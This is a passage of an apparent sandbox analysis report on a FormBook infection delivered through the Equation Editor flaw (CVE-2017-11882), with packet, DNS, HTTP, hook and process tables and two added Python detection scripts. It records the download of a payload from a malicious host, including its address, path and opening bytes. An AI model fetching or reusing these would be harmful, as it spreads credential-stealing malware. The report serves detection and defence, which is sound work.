Oct 27, 2021 16:42:17.983633041 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983658075 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983678102 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983694077 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983725071 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983750105 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983773947 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983812094 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983860016 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983866930 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983870983 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:17.983933926 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:17.983999014 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.002785921 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.010915041 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.010967016 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011007071 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011027098 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011043072 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011049032 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011193991 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011234999 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011253119 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011281967 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011312008 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011374950 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011449099 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011490107 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011508942 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011650085 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011687994 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011737108 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011749029 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011795044 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011806011 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011868954 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.011936903 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011977911 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.011995077 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012017965 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012049913 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012095928 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012108088 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012172937 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012209892 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012255907 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012267113 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012298107 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012322903 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012368917 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012382030 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012414932 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.012438059 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.012482882 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.016542912 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048263073 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048317909 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048361063 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048384905 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048409939 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048450947 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048492908 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048512936 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048542023 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048571110 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048613071 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048630953 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048661947 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048688889 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048729897 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048747063 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048782110 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048804045 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048844099 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.048896074 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048904896 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.048960924 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049001932 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049020052 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049055099 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049089909 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049160957 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049210072 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049247980 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049266100 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049288988 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049331903 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049380064 CEST  80        49165     2.56.59.211   192.168.2.22
Oct 27, 2021 16:42:18.049393892 CEST  49165     80        192.168.2.22  2.56.59.211
Oct 27, 2021 16:42:18.049427986 CEST  49165     80        192.168.2.22  2.56.59.211

                                              UDP Packets

Timestamp                             Src Port  Dst Port  Source IP     Dest IP
Oct 27, 2021 16:42:17.869247913 CEST  52167     53        192.168.2.22  8.8.8.8
Oct 27, 2021 16:42:17.888603926 CEST  53        52167     8.8.8.8       192.168.2.22
Oct 27, 2021 16:44:14.257828951 CEST  50591     53        192.168.2.22  8.8.8.8
Oct 27, 2021 16:44:14.508419037 CEST  53        50591     8.8.8.8       192.168.2.22

                                              DNS Queries

Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name               Type            Class
Oct 27, 2021 16:42:17.869247913 CEST  192.168.2.22  8.8.8.8  0x567b    Standard query (0)  binatonezx.tk      A (IP address)  IN (0x0001)
Oct 27, 2021 16:44:14.257828951 CEST  192.168.2.22  8.8.8.8  0xc18c    Standard query (0)  www.lenovoidc.com  A (IP address)  IN (0x0001)

                                              DNS Answers

Timestamp                             Source IP  Dest IP       Trans ID  Reply Code      Name               CName  Address      Type            Class
Oct 27, 2021 16:42:17.888603926 CEST  8.8.8.8    192.168.2.22  0x567b    No error (0)    binatonezx.tk      -      2.56.59.211  A (IP address)  IN (0x0001)
Oct 27, 2021 16:44:14.508419037 CEST  8.8.8.8    192.168.2.22  0xc18c    Name error (3)  www.lenovoidc.com  none   none         A (IP address)  IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • binatonezx.tk

                                              HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49165        2.56.59.211     80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp                             kBytes transferred  Direction  Data
Oct 27, 2021 16:42:17.944622040 CEST  0                   OUT        GET /seasonzx.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: binatonezx.tk
                                              Connection: Keep-Alive
Oct 27, 2021 16:42:17.983454943 CEST  2                   IN         HTTP/1.1 200 OK
                                              Date: Wed, 27 Oct 2021 14:42:17 GMT
                                              Server: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fips
                                              Last-Modified: Wed, 27 Oct 2021 07:19:00 GMT
                                              ETag: "80800-5cf50687391d8"
                                              Accept-Ranges: bytes
                                              Content-Length: 526336
                                              Vary: User-Agent
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 
0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00 00 06 0a 2b 00 06 2a 8a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 72 01 00 00 70 7d 05 00 00 04 2a 7a 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 2a 96 02 16 7d 0a 00 00 04 02 17 7d 0b 00 00 04 02 28 1b 00 00 0a 00 00 02 03 7d 05 00 00 04 02 04 7d 03 00 00 04 2a b2 02
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxa0> @ `@O @ H.textD `.rsrc @@.reloc@@B Ht|&(*0Hs~(~,s,(*#<0+*0s+*0sR+*0sT+*0s+*0s+*0s+*0s+*}}(rp}*z}}(}*}}(}}*
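The session above is EQNEDT32.EXE, the Equation Editor, fetching a PE file (`Content-Type: application/x-msdownload`, body starting with `MZ`) with the User-Agent that urlmon/WinINet sends on this Windows 7 build; the process list further down shows the download written to %AppData% as seasonhd72463.exe and executed. Three of the Sigma hits in the summary (EQNEDT32.EXE connecting to internet, File Dropped By EQNEDT32EXE, Droppers Exploiting CVE-2017-11882) describe exactly those actions. The detector below is an added example, not Joe Sandbox's or Sigma's own code: it streams constructed process, network and file events modelled on the report's values and emits one alert per rule, plus a correlated alert when a file the Equation Editor wrote is later executed. The event shape is my assumption, loosely following Sysmon event IDs; the paths, the dropped file name and the server address are the ones in the report.

```python
import ntpath
from typing import Dict, List

# Constructed telemetry (the event layout is assumed; values come from the
# report): id 1 = process create, 3 = network connect, 11 = file create.
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROP = r"C:\Users\user\AppData\Roaming\seasonhd72463.exe"

SAMPLE_EVENTS = [
    {"id": 1, "image": WORD, "parent": r"C:\Windows\explorer.exe",
     "cmd": f'"{WORD}" /Automation -Embedding'},
    # Word's owner file for the open document: benign, must not alert.
    {"id": 11, "image": WORD, "target": r"C:\Users\user\Desktop\~$V_Job Request.doc"},
    # Equation Editor is an out-of-process COM server, so its parent is the DCOM
    # launcher (svchost.exe), not WINWORD.EXE; rules keyed on Word as parent miss it.
    {"id": 1, "image": EQN, "parent": r"C:\Windows\System32\svchost.exe",
     "cmd": f'"{EQN}" -Embedding'},
    {"id": 3, "image": EQN, "dst_ip": "2.56.59.211", "dst_port": 80},
    {"id": 11, "image": EQN, "target": DROP},
    {"id": 1, "image": DROP, "parent": EQN, "cmd": DROP},
    {"id": 1, "image": DROP, "parent": DROP, "cmd": DROP},   # second instance (hollowed, per the report)
]

# Office helper binaries that have no business talking to the network, writing
# files or starting processes on their own.  EQNEDT32.EXE is the one seen here.
OFFICE_HELPERS = {"eqnedt32.exe"}
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com", ".pif")


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Stream the events once, emitting one alert per matching rule."""
    alerts: List[Dict] = []
    dropped = {}   # files written by a helper, keyed by lower-cased path

    def alert(rule: str, severity: str, detail: str) -> None:
        alerts.append({"rule": rule, "severity": severity, "detail": detail})

    for ev in events:
        img = basename(ev["image"])
        if ev["id"] == 3 and img in OFFICE_HELPERS:
            alert("eqnedt32_network_connection", "high",
                  f"{img} -> {ev['dst_ip']}:{ev['dst_port']}")
        elif ev["id"] == 11 and img in OFFICE_HELPERS:
            path = ev["target"].lower()
            dropped[path] = ev
            sev = "high" if path.endswith(EXECUTABLE_EXT) else "medium"
            alert("eqnedt32_file_drop", sev, f"{img} wrote {ev['target']}")
        elif ev["id"] == 1:
            if basename(ev["parent"]) in OFFICE_HELPERS:
                alert("eqnedt32_child_process", "high",
                      f"{basename(ev['parent'])} started {ev['image']}")
            if ev["image"].lower() in dropped:
                # The payload the helper wrote is now running: the dropper chain
                # behind the report's CVE-2017-11882 Sigma hit.
                alert("eqnedt32_dropper_executed", "critical", ev["image"])
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['severity']:8}] {a['rule']}: {a['detail']}")
```

Keying on the helper's own actions rather than on a WINWORD.EXE parent matters: the Equation Editor is launched through DCOM, so a Word-spawns-EQNEDT32 rule never fires. The Internet Explorer User-Agent in the request is likewise not an indicator on its own; the process that sent it is.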


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
GetMessageA    INLINE     explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: USER32.dll
Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xEB
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xEB
GetMessageW    INLINE     0x48 0x8B 0xB8 0x8A 0xAE 0xEB
GetMessageA    INLINE     0x48 0x8B 0xB8 0x82 0x2E 0xEB
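The two tables above record that the sample patched the entry of GetMessageA/W and PeekMessageA/W inside explorer.exe's USER32.dll (the "Modifies the prolog of user mode functions" signature in the summary). The script below is an added example, not the sandbox's hook scanner: it compares the first bytes of each export as read from the process against the on-disk image, and for every mismatch identifies the detour shape and resolves where it jumps, so a trampoline into memory that no loaded module backs stands out from an in-module patch. The prologue bytes, function addresses and module ranges are constructed for the demonstration; they are not the New Data bytes listed above.

```python
from typing import Dict, List, Optional, Tuple

# Constructed prologues (not the report's hook bytes): what a scanner sees when
# it reads the entry of an exported function from the live process and from the
# on-disk image of the same DLL.  x64 entry bytes carry no relocations, so the
# two copies should be identical; any difference is a patch.
CLEAN = bytes.fromhex("48895C2408574883EC20488BD9488BFA")          # 16 bytes, typical x64 prologue
# E9 rel32 detour; the remainder of the prologue is left in place.
HOOK_JMP32 = b"\xE9" + (0x1000).to_bytes(4, "little", signed=True) + CLEAN[5:]
# mov rax, imm64; jmp rax trampoline into a region no module backs.
HOOK_MOVJMP = b"\x48\xB8" + (0x2800000).to_bytes(8, "little") + b"\xFF\xE0" + CLEAN[12:]

DISK = {"GetMessageA": CLEAN, "GetMessageW": CLEAN, "PeekMessageA": CLEAN, "PostMessageA": CLEAN}
MEMORY = {"GetMessageA": HOOK_JMP32, "GetMessageW": HOOK_MOVJMP,
          "PeekMessageA": CLEAN, "PostMessageA": CLEAN}
# Export addresses and loaded-module ranges as a scanner would collect them (constructed).
FUNC_VA = {"GetMessageA": 0x7FF800011000, "GetMessageW": 0x7FF800012000,
           "PeekMessageA": 0x7FF800013000, "PostMessageA": 0x7FF800014000}
MODULES = {"USER32.dll": (0x7FF800000000, 0x7FF800200000),
           "explorer.exe": (0x7FF700000000, 0x7FF700320000)}


def detour_target(entry: int, code: bytes) -> Tuple[str, int]:
    """Recognise the common x64 detour shapes at a function entry and resolve where they go."""
    if code[:1] == b"\xE9":
        rel = int.from_bytes(code[1:5], "little", signed=True)
        return "jmp rel32", entry + 5 + rel
    if code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":
        return "mov rax, imm64; jmp rax", int.from_bytes(code[2:10], "little")
    if code[:2] == b"\xFF\x25":
        rel = int.from_bytes(code[2:6], "little", signed=True)
        return "jmp [rip+disp32]", entry + 6 + rel      # address of the pointer slot, not the final target
    if code[:1] == b"\xEB":
        rel = int.from_bytes(code[1:2], "little", signed=True)
        return "jmp rel8", entry + 2 + rel
    return "unknown patch", -1


def owning_module(addr: int, modules: Dict[str, Tuple[int, int]]) -> Optional[str]:
    """Name of the loaded module whose range contains addr, or None for unbacked memory."""
    for name, (lo, hi) in modules.items():
        if lo <= addr < hi:
            return name
    return None


def find_inline_hooks(disk: Dict[str, bytes], memory: Dict[str, bytes],
                      func_va: Dict[str, int], modules: Dict[str, Tuple[int, int]],
                      n: int = 16) -> List[Dict]:
    """Report every export whose first n bytes in memory differ from the disk copy."""
    hooks = []
    for name, expected in disk.items():
        actual = memory.get(name)
        if actual is None or actual[:n] == expected[:n]:
            continue
        shape, target = detour_target(func_va[name], actual)
        hooks.append({"function": name, "shape": shape, "target": target,
                      "target_module": owning_module(target, modules),
                      "expected": expected[:n].hex(), "actual": actual[:n].hex()})
    return hooks


if __name__ == "__main__":
    for h in find_inline_hooks(DISK, MEMORY, FUNC_VA, MODULES):
        where = h["target_module"] or "UNBACKED MEMORY"
        print(f"{h['function']}: {h['shape']} -> {h['target']:#x} ({where})")
```

On a live system the disk copy comes from the DLL's export table (pefile will resolve the RVAs) and the memory copy from ReadProcessMemory; on x86 mask the bytes covered by relocations before comparing, or the absolute addresses in the prologue will produce false positives. A detour that resolves inside the same module, as the jmp rel32 case does here, can be legitimate hot-patching; one that resolves outside every loaded module, as the second case does, is the injection signal this report shows.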

                                              Statistics

                                              Behavior


                                              System Behavior

                                              General

                                              Start time:16:42:17
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f600000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:42:19
                                              Start date:27/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:16:42:21
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 23%, ReversingLabs
                                              Reputation:low

                                              General

                                              Start time:16:42:25
                                              Start date:27/10/2021
                                              Path:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Imagebase:0x1100000
                                              File size:526336 bytes
                                              MD5 hash:9227463FFB6E37D271919E06D175EDA7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:16:42:27
                                              Start date:27/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
